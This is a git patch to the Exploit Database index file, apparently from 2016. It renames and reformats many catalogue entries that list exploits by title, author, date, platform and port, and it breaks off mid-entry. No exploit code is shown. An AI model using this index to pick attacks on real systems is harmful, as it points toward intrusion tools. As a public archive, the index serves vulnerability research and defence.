From b2749125b091d948b3fba87a5a7508f563465777 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sun, 4 Sep 2016 05:08:08 +0000 Subject: [PATCH] DB: 2016-09-04 --- files.csv | 4362 +++++++++++++++--------------- platforms/php/webapps/2173.txt | 6 +- platforms/php/webapps/37563.html | 2 +- platforms/php/webapps/4538.txt | 4 +- 4 files changed, 2187 insertions(+), 2187 deletions(-) diff --git a/files.csv b/files.csv index e1259047f..97bade1ee 100755 --- a/files.csv +++ b/files.csv @@ -4,7 +4,7 @@ id,file,description,date,author,platform,type,port 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (Redhat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 -6,platforms/php/webapps/6.php,"WordPress 2.0.2 - (cache) Remote Shell Injection Exploit",2006-05-25,rgod,php,webapps,0 +6,platforms/php/webapps/6.php,"Wordpress 2.0.2 - (cache) Remote Shell Injection Exploit",2006-05-25,rgod,php,webapps,0 7,platforms/linux/remote/7.pl,"Samba 2.2.x - Remote Root Buffer Overflow",2003-04-07,"H D Moore",linux,remote,139 8,platforms/linux/remote/8.c,"SETI@home Clients - Buffer Overflow",2003-04-08,zillion,linux,remote,0 9,platforms/windows/dos/9.c,"Apache HTTP Server 2.x - Memory Leak Exploit",2003-04-09,"Matthew Murphy",windows,dos,0 @@ -13,7 +13,7 @@ id,file,description,date,author,platform,type,port 11,platforms/linux/dos/11.c,"Apache 2.0.44 (Linux) - Remote Denial of Service",2003-04-11,"Daniel Nystram",linux,dos,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 13,platforms/windows/dos/13.c,"Chindi Server 1.0 - Denial of Service",2003-04-18,"Luca Ercoli",windows,dos,0 -15,platforms/osx/local/15.c,"Mac OS X 10.2.4 - DirectoryService (PATH) Privilege Escalation",2003-04-18,"Neeko Oni",osx,local,0 +15,platforms/osx/local/15.c,"Mac OSX 10.2.4 - DirectoryService (PATH) Privilege Escalation",2003-04-18,"Neeko Oni",osx,local,0 16,platforms/linux/remote/16.c,"PoPToP PPTP 1.1.4-b3 - Remote Root Exploit",2003-04-18,einstein,linux,remote,1723 17,platforms/windows/dos/17.pl,"Xeneo Web Server 2.2.9.0 - Denial of Service",2003-04-22,"Tom Ferris",windows,dos,0 18,platforms/linux/remote/18.sh,"Snort 1.9.1 - Remote Root Exploit (p7snort191.sh)",2003-04-23,truff,linux,remote,0 @@ -84,7 +84,7 @@ id,file,description,date,author,platform,type,port 82,platforms/windows/dos/82.c,"Piolet Client 1.05 - Remote Denial of Service",2003-08-20,"Luca Ercoli",windows,dos,0 83,platforms/windows/remote/83.html,"Microsoft Internet Explorer - Object Data Remote Exploit (M03-032)",2003-08-21,malware,windows,remote,0 84,platforms/linux/remote/84.c,"Gopherd 3.0.5 - FTP Gateway Remote Overflow",2003-08-22,vade79,linux,remote,70 -86,platforms/multiple/remote/86.c,"Real Server 7/8/9 - Remote Root Exploit (Windows / Linux)",2003-08-25,"Johnny Cyberpunk",multiple,remote,554 +86,platforms/multiple/remote/86.c,"Real Server 7/8/9 (Windows / Linux) - Remote Root Exploit",2003-08-25,"Johnny Cyberpunk",multiple,remote,554 88,platforms/linux/remote/88.c,"GtkFtpd 1.0.4 - Remote Root Buffer Overflow",2003-08-28,vade79,linux,remote,21 89,platforms/linux/remote/89.c,"Linux pam_lib_smb < 1.1.6 - /bin/login Remote Exploit",2003-08-29,vertex,linux,remote,23 90,platforms/windows/remote/90.c,"eMule/xMule/LMule - OP_SERVERMESSAGE Format String Exploit",2003-09-01,"Rémi Denis-Courmont",windows,remote,4661 @@ -156,7 +156,7 @@ id,file,description,date,author,platform,type,port 159,platforms/windows/remote/159.c,"WFTPD Server 3.21 - Remote Buffer Overflow",2004-02-29,rdxaxl,windows,remote,21 160,platforms/linux/local/160.c,"Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Privilege Escalation (2)",2004-03-01,"Paul Starzetz",linux,local,0 161,platforms/windows/dos/161.c,"Red Faction 1.20 - Server Reply Remote Buffer Overflow",2004-03-04,"Luigi Auriemma",windows,dos,0 -163,platforms/windows/remote/163.pl,"Eudora 6.0.3 - Attachment Spoofing Exploit (Windows)",2004-03-19,anonymous,windows,remote,0 +163,platforms/windows/remote/163.pl,"Eudora 6.0.3 (Windows) - Attachment Spoofing Exploit",2004-03-19,anonymous,windows,remote,0 164,platforms/windows/remote/164.c,"Foxmail 5.0 - PunyLib.dll Remote Stack Overflow",2004-03-23,xfocus,windows,remote,0 165,platforms/windows/remote/165.c,"WS_FTP Server 4.0.2 - ALLO Remote Buffer Overflow",2004-03-23,"Hugh Mann",windows,remote,21 166,platforms/windows/remote/166.pl,"eSignal 7.6 - STREAMQUOTE Remote Buffer Overflow",2004-03-26,VizibleSoft,windows,remote,80 @@ -190,7 +190,7 @@ id,file,description,date,author,platform,type,port 195,platforms/hp-ux/dos/195.sh,"HP-UX 11.00/10.20 - crontab Overwrite Files Exploit",2000-11-19,dubhe,hp-ux,dos,0 197,platforms/solaris/local/197.c,"Solaris/SPARC 2.7 / 7 - locale Format String Exploit",2000-11-20,"Solar Eclipse",solaris,local,0 199,platforms/hp-ux/local/199.c,"HP-UX 11.0 - pppd Stack Buffer Overflow",2000-11-20,K2,hp-ux,local,0 -200,platforms/bsd/local/200.c,"BSDi suidperl - Local Stack Buffer Overflow",2000-11-21,vade79,bsd,local,0 +200,platforms/bsd/local/200.c,"BSDi SUIDPerl - Local Stack Buffer Overflow",2000-11-21,vade79,bsd,local,0 201,platforms/multiple/remote/201.c,"wu-ftpd 2.6.0 - Remote Root Exploit",2000-11-21,venglin,multiple,remote,21 202,platforms/bsd/local/202.c,"BSDi 3.0 / 4.0 - rcvtty[mh] Local Exploit",2000-11-21,vade79,bsd,local,0 203,platforms/linux/local/203.sh,"vixie-cron - Privilege Escalation",2000-11-21,"Michal Zalewski",linux,local,0 @@ -201,7 +201,7 @@ id,file,description,date,author,platform,type,port 208,platforms/linux/remote/208.c,"INND/NNRP < 1.6.x - Remote Root Overflow",2000-11-30,"Babcia Padlina",linux,remote,119 209,platforms/linux/local/209.c,"GLIBC (via /bin/su) - Privilege Escalation",2000-11-30,localcore,linux,local,0 210,platforms/solaris/local/210.c,"Solaris - locale Format Strings (noexec stack) Exploit",2000-11-30,warning3,solaris,local,0 -211,platforms/cgi/remote/211.c,"PHF (Linux-x86) - Buffer Overflow",2000-12-01,proton,cgi,remote,0 +211,platforms/cgi/remote/211.c,"PHF (Linux/x86) - Buffer Overflow",2000-12-01,proton,cgi,remote,0 212,platforms/hp-ux/dos/212.c,"HP-UX FTPD - Remote Buffer Overflow",2000-12-01,venglin,hp-ux,dos,0 213,platforms/solaris/remote/213.c,"Solaris sadmind - Remote Buffer Overflow",2000-12-01,Optyx,solaris,remote,111 214,platforms/windows/dos/214.c,"Microsoft Windows - 'Jolt2.c' Denial of Service",2000-12-02,phonix,windows,dos,0 @@ -254,10 +254,10 @@ id,file,description,date,author,platform,type,port 265,platforms/irix/local/265.sh,"IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) - /usr/bin/lpstat Local Exploit",2001-05-07,LSD-PLaNET,irix,local,0 266,platforms/windows/remote/266.c,"Microsoft Windows 2000 SP1/SP2 - isapi .printer Extension Overflow (1)",2001-05-07,"Ryan Permeh",windows,remote,80 268,platforms/windows/remote/268.c,"Microsoft Windows 2000 SP1/SP2 - isapi .printer Extension Overflow (2)",2001-05-08,"dark spyrit",windows,remote,80 -269,platforms/linux/remote/269.c,"BeroFTPD 1.3.4(1) - Remote Root Exploit (Linux x86)",2001-05-08,qitest1,linux,remote,21 +269,platforms/linux/remote/269.c,"BeroFTPD 1.3.4(1) (Linux/x86) - Remote Root Exploit",2001-05-08,qitest1,linux,remote,21 270,platforms/irix/local/270.sh,"IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) - /usr/lib/print/netprint Local Exploit",2001-05-08,LSD-PLaNET,irix,local,0 271,platforms/windows/local/271.c,"Microsoft Windows Utility Manager - Local SYSTEM Exploit (MS04-011)",2004-04-15,"Cesar Cerrudo",windows,local,0 -272,platforms/windows/local/272.c,"WinZIP - MIME Parsing Overflow Exploit (PoC)",2004-04-15,snooq,windows,local,0 +272,platforms/windows/local/272.c,"WinZip - MIME Parsing Overflow Exploit (PoC)",2004-04-15,snooq,windows,local,0 273,platforms/linux/local/273.c,"SquirrelMail - chpasswd Buffer Overflow",2004-04-20,x314,linux,local,0 274,platforms/linux/dos/274.c,"Linux Kernel 2.6.3 - 'setsockopt' Local Denial of Service",2004-04-21,"Julien Tinnes",linux,dos,0 275,platforms/windows/remote/275.c,"Microsoft Windows IIS 5.0 - SSL Remote Buffer Overflow (MS04-011)",2004-04-21,"Johnny Cyberpunk",windows,remote,443 @@ -282,7 +282,7 @@ id,file,description,date,author,platform,type,port 297,platforms/windows/remote/297.c,"Sasser Worm ftpd - Remote Buffer Overflow (port 5554)",2004-05-16,mandragore,windows,remote,5554 298,platforms/windows/dos/298.pl,"Emule 0.42e - Remote Denial of Service",2004-05-16,"Rafel Ivgi",windows,dos,80 299,platforms/windows/dos/299.c,"Symantec Multiple Firewall - DNS Response Denial of Service",2004-05-16,houseofdabus,windows,dos,0 -300,platforms/multiple/remote/300.c,"CVS - Remote Entry Line Heap Overflow Root Exploit (Linux/FreeBSD)",2004-06-25,Ac1dB1tCh3z,multiple,remote,2401 +300,platforms/multiple/remote/300.c,"CVS (Linux/FreeBSD) - Remote Entry Line Heap Overflow Root Exploit",2004-06-25,Ac1dB1tCh3z,multiple,remote,2401 301,platforms/solaris/remote/301.c,"CVS - Remote Entry Line Root Heap Overflow",2004-06-25,anonymous,solaris,remote,2401 302,platforms/unix/local/302.c,"UNIX 7th Edition /bin/mkdir - Local Buffer Overflow",2004-06-25,anonymous,unix,local,0 303,platforms/linux/remote/303.pl,"Borland Interbase 7.x - Remote Exploit",2004-06-25,"Aviram Jenik",linux,remote,3050 @@ -341,7 +341,7 @@ id,file,description,date,author,platform,type,port 364,platforms/linux/remote/364.pl,"Samba 3.0.4 - SWAT Authorization Buffer Overflow",2004-07-22,"Noam Rathaus",linux,remote,901 365,platforms/windows/dos/365.html,"Microsoft Internet Explorer - Denial of Service (11 bytes)",2004-07-23,Phuong,windows,dos,0 366,platforms/windows/dos/366.pl,"Microsoft Windows SMS 2.0 - Denial of Service",2004-07-24,MacDefender,windows,dos,0 -367,platforms/osx/local/367.txt,"Mac OS X - Panther Internet Connect Privilege Escalation",2004-07-28,B-r00t,osx,local,0 +367,platforms/osx/local/367.txt,"Mac OSX - Panther Internet Connect Privilege Escalation",2004-07-28,B-r00t,osx,local,0 368,platforms/windows/local/368.c,"Microsoft Windows XP - Task Scheduler (.job) Universal Exploit (MS04-022)",2004-07-31,houseofdabus,windows,local,0 369,platforms/linux/local/369.pl,"SoX - Local Buffer Overflow",2004-08-01,"Serkan Akpolat",linux,local,0 370,platforms/linux/dos/370.c,"Citadel/UX - Remote Denial of Service (PoC)",2004-08-02,CoKi,linux,dos,0 @@ -358,13 +358,13 @@ id,file,description,date,author,platform,type,port 382,platforms/linux/remote/382.c,"Melange Chat Server 1.10 - Remote Buffer Overflow",2002-12-24,innerphobia,linux,remote,0 383,platforms/multiple/dos/383.c,"psyBNC 2.3 - Denial of Service",2002-05-19,"Lunar Fault",multiple,dos,31337 384,platforms/php/webapps/384.txt,"PHP - (php-exec-dir) Patch Command Access Restriction Bypass",2004-08-08,VeNoMouS,php,webapps,0 -385,platforms/windows/dos/385.c,"Microsoft Messenger - Denial of Service (MS03-043) (Linux)",2004-08-08,VeNoMouS,windows,dos,0 +385,platforms/windows/dos/385.c,"Microsoft Messenger (Linux) - Denial of Service (MS03-043)",2004-08-08,VeNoMouS,windows,dos,0 386,platforms/linux/remote/386.c,"xine 0.99.2 - Remote Stack Overflow",2004-08-09,c0ntex,linux,remote,80 387,platforms/linux/remote/387.c,"Dropbear SSH 0.34 - Remote Root Exploit",2004-08-09,livenn,linux,remote,22 388,platforms/windows/local/388.c,"Ollydbg 1.10 - Format String Bug",2004-08-10,"Ahmet Cihan",windows,local,0 389,platforms/linux/remote/389.c,"LibPNG Graphics Library - Remote Buffer Overflow",2004-08-11,infamous41md,linux,remote,0 390,platforms/linux/remote/390.c,"GV PostScript Viewer - Remote Buffer Overflow",2004-08-13,infamous41md,linux,remote,0 -391,platforms/osx/remote/391.pl,"Mac OS X 10.3.3 - AppleFileServer Remote Root Overflow",2004-08-13,"Dino Dai Zovi",osx,remote,548 +391,platforms/osx/remote/391.pl,"Mac OSX 10.3.3 - AppleFileServer Remote Root Overflow",2004-08-13,"Dino Dai Zovi",osx,remote,548 392,platforms/linux/remote/392.c,"Remote CVS 1.11.15 - (error_prog_name) Remote Exploit",2004-08-13,"Gyan Chawdhary",linux,remote,2401 393,platforms/linux/local/393.c,"LibPNG 1.2.5 - png_jmpbuf() Local Buffer Overflow",2004-08-13,anonymous,linux,local,0 394,platforms/linux/local/394.c,"ProFTPd (ftpdctl) - Local pr_ctrls_connect",2004-08-13,pi3,linux,local,0 @@ -381,8 +381,8 @@ id,file,description,date,author,platform,type,port 406,platforms/php/webapps/406.pl,"phpMyWebhosting - SQL Injection",2004-08-20,"Noam Rathaus",php,webapps,0 407,platforms/cgi/webapps/407.txt,"AWStats 5.0-6.3 - Input Validation Hole in 'logfile'",2004-08-21,"Johnathan Bat",cgi,webapps,0 408,platforms/linux/remote/408.c,"Qt - .BMP Parsing Bug Heap Overflow",2004-08-21,infamous41md,linux,remote,0 -409,platforms/bsd/remote/409.c,"BSD (telnetd) - Remote Root Exploit",2001-06-09,Teso,bsd,remote,23 -411,platforms/linux/local/411.c,"Sendmail 8.11.x - Exploit (i386-Linux)",2001-01-01,sd,linux,local,0 +409,platforms/bsd/remote/409.c,"BSD (TelnetD) - Remote Root Exploit",2001-06-09,Teso,bsd,remote,23 +411,platforms/linux/local/411.c,"Sendmail 8.11.x (Linux/i386) - Exploit",2001-01-01,sd,linux,local,0 413,platforms/linux/remote/413.c,"MusicDaemon 0.0.3 - Remote Denial of Service / /etc/shadow Stealer (2)",2004-08-24,Tal0n,linux,remote,0 416,platforms/linux/remote/416.c,"Hafiye 1.0 - Remote Terminal Escape Sequence Injection",2004-08-25,"Serkan Akpolat",linux,remote,0 417,platforms/linux/local/417.c,"SquirrelMail - (chpasswd) Privilege Escalation (Bruteforce Exploit)",2004-08-25,Bytes,linux,local,0 @@ -436,7 +436,7 @@ id,file,description,date,author,platform,type,port 565,platforms/php/webapps/565.txt,"Silent Storm Portal - Multiple Vulnerabilities",2004-09-30,"CHT Security Research",php,webapps,0 566,platforms/windows/remote/566.pl,"IPSwitch WhatsUp Gold 8.03 - Remote Buffer Overflow",2004-10-04,LoWNOISE,windows,remote,80 568,platforms/windows/remote/568.c,"Icecast 2.0.1 Win32 - Remote Code Execution Exploit",2004-10-06,Delikon,windows,remote,8000 -570,platforms/php/webapps/570.txt,"WordPress 1.2 - HTTP Splitting",2004-10-10,"Tenable NS",php,webapps,0 +570,platforms/php/webapps/570.txt,"Wordpress 1.2 - HTTP Splitting",2004-10-10,"Tenable NS",php,webapps,0 571,platforms/windows/dos/571.c,"Monolith Games - Local Buffer Overflow",2004-10-10,"Luigi Auriemma",windows,dos,0 572,platforms/windows/remote/572.pl,"Eudora 6.2.0.7 - Attachment Spoofer Exploit",2004-10-11,"Paul Szabo",windows,remote,0 573,platforms/windows/remote/573.c,"Icecast 2.0.1 Win32 - Remote Code Execution Exploit (modded)",2004-10-12,K-C0d3r,windows,remote,8000 @@ -448,7 +448,7 @@ id,file,description,date,author,platform,type,port 581,platforms/linux/remote/581.c,"ProFTPD 1.2.10 - Remote Users Enumeration Exploit",2004-10-17,"Leon Juranic",linux,remote,0 582,platforms/windows/remote/582.c,"YahooPOPs 1.6 - SMTP Remote Buffer Overflow",2004-10-18,"Diabolic Crab",windows,remote,25 583,platforms/windows/remote/583.pl,"SLX Server 6.1 - Arbitrary File Creation Exploit (PoC)",2004-10-18,"Carl Livitt",windows,remote,0 -584,platforms/windows/remote/584.c,"Microsoft Windows Metafile - (.emf) Heap Overflow (MS04-032)",2004-10-20,houseofdabus,windows,remote,0 +584,platforms/windows/remote/584.c,"Microsoft Windows (Windows/x86) - Metafile '.emf' Heap Overflow (MS04-032)",2004-10-20,houseofdabus,windows,remote,0 585,platforms/windows/dos/585.pl,"Microsoft Windows IIS - WebDAV XML Denial of Service (MS04-030)",2004-10-20,"Amit Klein",windows,dos,0 586,platforms/linux/local/586.c,"BitchX 1.0c19 - Privilege Escalation (suid?)",2004-10-20,Sha0,linux,local,0 587,platforms/linux/local/587.c,"Apache 1.3.31 mod_include - Local Buffer Overflow",2004-10-21,xCrZx,linux,local,0 @@ -508,7 +508,7 @@ id,file,description,date,author,platform,type,port 655,platforms/windows/dos/655.c,"Star Wars Battlefront 1.1 - Fake Players Denial of Service",2004-11-24,"Luigi Auriemma",windows,dos,0 657,platforms/linux/local/657.c,"atari800 - Privilege Escalation",2004-11-25,pi3,linux,local,0 658,platforms/windows/remote/658.c,"MailEnable Mail Server IMAP 1.52 - Remote Buffer Overflow",2004-11-25,class101,windows,remote,143 -659,platforms/cgi/webapps/659.txt,"EZshopper - Directory Transversal (loadpage.cgi)",2004-11-25,"Zero X",cgi,webapps,0 +659,platforms/cgi/webapps/659.txt,"eZshopper - (loadpage.cgi) Directory Transversal",2004-11-25,"Zero X",cgi,webapps,0 660,platforms/linux/remote/660.c,"PHP 4.3.7/5.0.0RC3 - memory_limit Remote Exploit",2004-11-27,"Gyan Chawdhary",linux,remote,80 662,platforms/windows/dos/662.pl,"3Dmax 6.x backburner Manager 2.2 - Denial of Service",2004-11-28,Xtiger,windows,dos,0 663,platforms/windows/remote/663.py,"Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow",2004-11-29,muts,windows,remote,143 @@ -525,7 +525,7 @@ id,file,description,date,author,platform,type,port 676,platforms/php/webapps/676.c,"phpBB 1.0.0 / 2.0.10 - admin_cash.php Remote Exploit",2004-12-05,evilrabbi,php,webapps,0 677,platforms/windows/dos/677.txt,"GetRight 5.2a - Skin File (.grs) Buffer Overflow",2004-12-06,ATmaCA,windows,dos,0 679,platforms/windows/dos/679.c,"Battlefield 1942 1.6.19 + Vietnam 1.2 - Broadcast Client Crash",2004-12-07,"Luigi Auriemma",windows,dos,0 -680,platforms/osx/local/680.txt,"Mac OS X Adobe Version Cue - Privilege Escalation (Bash)",2004-12-08,"Jonathan Bringhurst",osx,local,0 +680,platforms/osx/local/680.txt,"Mac OSX Adobe Version Cue - Privilege Escalation (Bash)",2004-12-08,"Jonathan Bringhurst",osx,local,0 681,platforms/linux/remote/681.c,"Citadel/UX 6.27 - Remote Root Format String Exploit",2004-12-12,CoKi,linux,remote,504 682,platforms/windows/dos/682.c,"Codename Eagle 1.42 - Socket Unreacheable Denial of Service",2004-12-13,"Luigi Auriemma",windows,dos,0 683,platforms/windows/dos/683.c,"Lithtech Engine (new protocol) - Socket Unreacheable Denial of Service",2004-12-13,"Luigi Auriemma",windows,dos,0 @@ -587,11 +587,11 @@ id,file,description,date,author,platform,type,port 759,platforms/windows/remote/759.cpp,"Apple iTunes - Playlist Buffer Overflow Download Shellcoded Exploit",2005-01-16,ATmaCA,windows,remote,0 760,platforms/windows/local/760.cpp,"Peer2Mail 1.4 - Encrypted Password Dumper Exploit",2005-01-16,ATmaCA,windows,local,0 761,platforms/windows/remote/761.cpp,"NodeManager Professional 2.00 - Buffer Overflow",2005-01-18,"Tan Chew Keong",windows,remote,162 -762,platforms/osx/dos/762.c,"Mac OS X 10.3.7 - Input Validation Flaw parse_machfile() Denial of Service",2005-01-20,nemo,osx,dos,0 +762,platforms/osx/dos/762.c,"Mac OSX 10.3.7 - Input Validation Flaw parse_machfile() Denial of Service",2005-01-20,nemo,osx,dos,0 763,platforms/linux/local/763.c,"fkey 0.0.2 - Local File Accessibility Exploit",2005-01-20,vade79,linux,local,79 764,platforms/linux/remote/764.c,"Apache OpenSSL - 'OpenFuckV2.c' Remote Exploit",2003-04-04,spabam,linux,remote,80 765,platforms/windows/remote/765.c,"Microsoft Internet Explorer - .ANI files handling Universal Exploit (MS05-002)",2005-01-22,houseofdabus,windows,remote,0 -766,platforms/osx/local/766.c,"Mac OS X 10.3.7 - mRouter Privilege Escalation",2005-01-22,nemo,osx,local,0 +766,platforms/osx/local/766.c,"Mac OSX 10.3.7 - mRouter Privilege Escalation",2005-01-22,nemo,osx,local,0 767,platforms/windows/remote/767.pl,"Golden FTP Server 2.02b - Remote Buffer Overflow",2005-01-22,Barabas,windows,remote,21 769,platforms/windows/local/769.c,"Funduc Search and Replace - Compressed File Local Buffer Overflow Exploit",2005-01-24,ATmaCA,windows,local,0 770,platforms/windows/dos/770.txt,"Apple QuickTime 6.5.2.10 - (.qtif) Image Parsing",2005-01-24,ATmaCA,windows,dos,0 @@ -616,18 +616,18 @@ id,file,description,date,author,platform,type,port 790,platforms/cgi/webapps/790.pl,"PerlDesk 1.x - SQL Injection",2005-02-05,deluxe89,cgi,webapps,0 791,platforms/linux/local/791.c,"Setuid perl - PerlIO_Debug() Overflow",2005-02-07,"Kevin Finisterre",linux,local,0 792,platforms/linux/local/792.c,"Setuid perl - PerlIO_Debug() Root owned file creation",2005-02-07,"Kevin Finisterre",linux,local,0 -793,platforms/osx/local/793.pl,"Mac OS X - .DS_Store Arbitrary File Overwrite",2005-02-07,vade79,osx,local,0 +793,platforms/osx/local/793.pl,"Mac OSX - .DS_Store Arbitrary File Overwrite",2005-02-07,vade79,osx,local,0 794,platforms/windows/remote/794.c,"3CServer 1.1 - FTP Server Remote Exploit",2005-02-07,mandragore,windows,remote,21 -795,platforms/osx/local/795.pl,"Mac OS X Adobe Version Cue - Privilege Escalation (Perl)",2005-02-07,0xdeadbabe,osx,local,0 +795,platforms/osx/local/795.pl,"Mac OSX Adobe Version Cue - Privilege Escalation (Perl)",2005-02-07,0xdeadbabe,osx,local,0 796,platforms/linux/local/796.sh,"Exim 4.42 - Privilege Escalation",2005-02-07,darkeagle,linux,local,0 797,platforms/windows/dos/797.py,"Foxmail 2.0 - (MAIL FROM:) Denial of Service",2005-02-07,OYXin,windows,dos,0 798,platforms/windows/local/798.c,"DelphiTurk CodeBank 3.1 - Local Username and Password Disclosure",2005-02-08,Kozan,windows,local,0 -799,platforms/osx/dos/799.c,"Mac OS X - AppleFileServer Remote Denial of Service",2005-02-08,nemo,osx,dos,0 +799,platforms/osx/dos/799.c,"Mac OSX - AppleFileServer Remote Denial of Service",2005-02-08,nemo,osx,dos,0 800,platforms/php/webapps/800.txt,"PostNuke PostWrap Module - Remote Exploit",2005-02-08,"ALBANIA SECURITY",php,webapps,0 801,platforms/php/webapps/801.c,"PHP-Nuke 7.4 - Admin Exploit",2005-02-09,Silentium,php,webapps,0 802,platforms/windows/remote/802.cpp,"MSN Messenger - .PNG Image Buffer Overflow Download Shellcoded Exploit",2005-02-09,ATmaCA,windows,remote,0 803,platforms/windows/local/803.c,"DelphiTurk FTP 1.0 - Passwords to Local Users Exploit",2005-02-09,Kozan,windows,local,0 -804,platforms/windows/remote/804.c,"MSN Messenger - .PNG Image Buffer Overflow (Linux)",2005-02-09,dgr,windows,remote,0 +804,platforms/windows/remote/804.c,"MSN Messenger (Linux) - .PNG Image Buffer Overflow",2005-02-09,dgr,windows,remote,0 805,platforms/multiple/remote/805.c,"ELOG 2.5.6 - Remote Shell Exploit",2005-02-09,n4rk0tix,multiple,remote,8080 806,platforms/linux/remote/806.c,"Prozilla 1.3.7.3 - Remote Format String Exploit",2005-02-09,"Serkan Akpolat",linux,remote,8080 807,platforms/php/webapps/807.txt,"MyPHP Forum 1.0 - SQL Injection",2005-02-10,GHC,php,webapps,0 @@ -640,7 +640,7 @@ id,file,description,date,author,platform,type,port 814,platforms/php/webapps/814.txt,"MercuryBoard 1.1.1 - SQL Injection",2005-02-12,Zeelock,php,webapps,0 815,platforms/linux/dos/815.c,"CA BrightStor ARCserve Backup - Remote Buffer Overlow PoC",2005-02-12,cybertronic,linux,dos,0 816,platforms/linux/local/816.c,"GNU a2ps - 'Anything to PostScript' Local Exploit (Not SUID)",2005-02-13,lizard,linux,local,0 -817,platforms/cgi/dos/817.pl,"AwStats 6.4 - Denial of Service",2005-02-14,GHC,cgi,dos,0 +817,platforms/cgi/dos/817.pl,"AWStats 6.4 - Denial of Service",2005-02-14,GHC,cgi,dos,0 818,platforms/php/webapps/818.txt,"vBulletin 3.0.4 - 'forumdisplay.php' Code Execution (1)",2005-02-14,AL3NDALEEB,php,webapps,0 819,platforms/windows/remote/819.py,"Savant Web Server 3.1 - Remote Buffer Overflow (French Windows OS support)",2005-02-15,"Jerome Athias",windows,remote,80 820,platforms/php/webapps/820.php,"vBulletin 3.0.4 - 'forumdisplay.php' Code Execution (2)",2005-02-15,AL3NDALEEB,php,webapps,0 @@ -648,11 +648,11 @@ id,file,description,date,author,platform,type,port 823,platforms/windows/remote/823.c,"BolinTech Dream FTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String Exploit",2004-02-11,Skylined,windows,remote,21 824,platforms/linux/local/824.c,"VisualBoyAdvanced 1.7.x - Local Shell Exploit (non suid)",2005-09-13,Qnix,linux,local,0 825,platforms/windows/remote/825.c,"3Com FTP Server 2.0 - Remote Overflow",2005-02-17,c0d3r,windows,remote,21 -826,platforms/linux/remote/826.c,"Medal of Honor Spearhead - Server Remote Buffer Overflow (Linux)",2005-02-18,millhouse,linux,remote,12203 +826,platforms/linux/remote/826.c,"Medal of Honor Spearhead (Linux) - Server Remote Buffer Overflow",2005-02-18,millhouse,linux,remote,12203 827,platforms/windows/remote/827.c,"3Com 3CDaemon FTP - Unauthorized 'USER' Remote Buffer Overflow Exploit",2005-02-18,class101,windows,remote,21 828,platforms/multiple/remote/828.c,"Knox Arkeia Server Backup 5.3.x - Remote Root Exploit",2005-02-18,"John Doe",multiple,remote,617 829,platforms/hardware/remote/829.c,"Thomson TCW690 - POST Password Validation Exploit",2005-02-19,MurDoK,hardware,remote,80 -830,platforms/windows/remote/830.c,"SHOUTcast 1.9.4 - File Request Format String Remote Exploit (Windows)",2005-02-19,mandragore,windows,remote,8000 +830,platforms/windows/remote/830.c,"SHOUTcast 1.9.4 (Windows) - File Request Format String Remote Exploit",2005-02-19,mandragore,windows,remote,8000 831,platforms/linux/remote/831.c,"GNU Cfengine 2.17p1 - RSA Authentication Heap Overflow",2005-02-20,jsk,linux,remote,5803 832,platforms/php/webapps/832.txt,"vBulletin 3.0.6 - PHP Code Injection",2005-02-22,pokley,php,webapps,0 833,platforms/windows/local/833.cpp,"PeerFTP 5 - Local Password Disclosure Exploit",2005-02-22,Kozan,windows,local,0 @@ -694,11 +694,11 @@ id,file,description,date,author,platform,type,port 871,platforms/php/webapps/871.txt,"phpBB 2.0.12 - Session Handling Authentication Bypass (tutorial 2)",2005-03-11,Ali7,php,webapps,0 872,platforms/php/webapps/872.pl,"SocialMPN - Arbitrary File Injection Exploit",2005-03-11,y3dips,php,webapps,0 873,platforms/php/webapps/873.txt,"phpDEV5 - Remote Default Insecure Users",2005-03-11,Ali7,php,webapps,0 -874,platforms/windows/dos/874.cpp,"Ethereal 0.10.9 - '3G-A11' Remote Buffer Overflow (Windows)",2005-03-12,"Leon Juranic",windows,dos,0 +874,platforms/windows/dos/874.cpp,"Ethereal 0.10.9 (Windows) - '3G-A11' Remote Buffer Overflow",2005-03-12,"Leon Juranic",windows,dos,0 875,platforms/windows/remote/875.c,"Sentinel LM 7.x - UDP License Service Remote Buffer Overflow",2005-03-13,class101,windows,remote,5093 876,platforms/linux/local/876.c,"PaX - Double-Mirrored VMA munmap Privilege Escalation",2005-03-14,"Christophe Devine",linux,local,0 877,platforms/linux/local/877.pl,"Frank McIngvale LuxMan 0.41 - Local Buffer Overflow",2005-03-14,"Kevin Finisterre",linux,local,0 -878,platforms/linux/remote/878.c,"Ethereal 0.10.9 - '3G-A11' Remote Buffer Overflow (Linux)",2005-03-14,"Diego Giagio",linux,remote,0 +878,platforms/linux/remote/878.c,"Ethereal 0.10.9 (Linux) - '3G-A11' Remote Buffer Overflow",2005-03-14,"Diego Giagio",linux,remote,0 879,platforms/multiple/remote/879.pl,"LimeWire 4.1.2 - 4.5.6 Inappropriate Get Request Remote Exploit",2005-03-14,lammat,multiple,remote,0 880,platforms/multiple/dos/880.pl,"Freeciv Server 2.0.0beta8 - Denial of Service",2005-03-14,"Nico Spicher",multiple,dos,0 881,platforms/php/webapps/881.txt,"ZPanel 2.5 - SQL Injection",2005-03-15,Mikhail,php,webapps,0 @@ -715,7 +715,7 @@ id,file,description,date,author,platform,type,port 892,platforms/php/webapps/892.txt,"phpMyFamily 1.4.0 - Authentication Bypass SQL Injection",2005-03-21,kre0n,php,webapps,0 893,platforms/windows/dos/893.pl,"Ocean FTP Server 1.00 - Denial of Service",2005-03-21,"GSS IT",windows,dos,0 895,platforms/linux/local/895.c,"Linux Kernel 2.4.x / 2.6.x - 'uselib()' Privilege Escalation (3)",2005-03-22,sd,linux,local,0 -896,platforms/osx/local/896.c,"Mac OS X 10.3.8 - (CF_CHARSET_PATH) Buffer Overflow Privilege Escalation",2005-03-22,vade79,osx,local,0 +896,platforms/osx/local/896.c,"Mac OSX 10.3.8 - 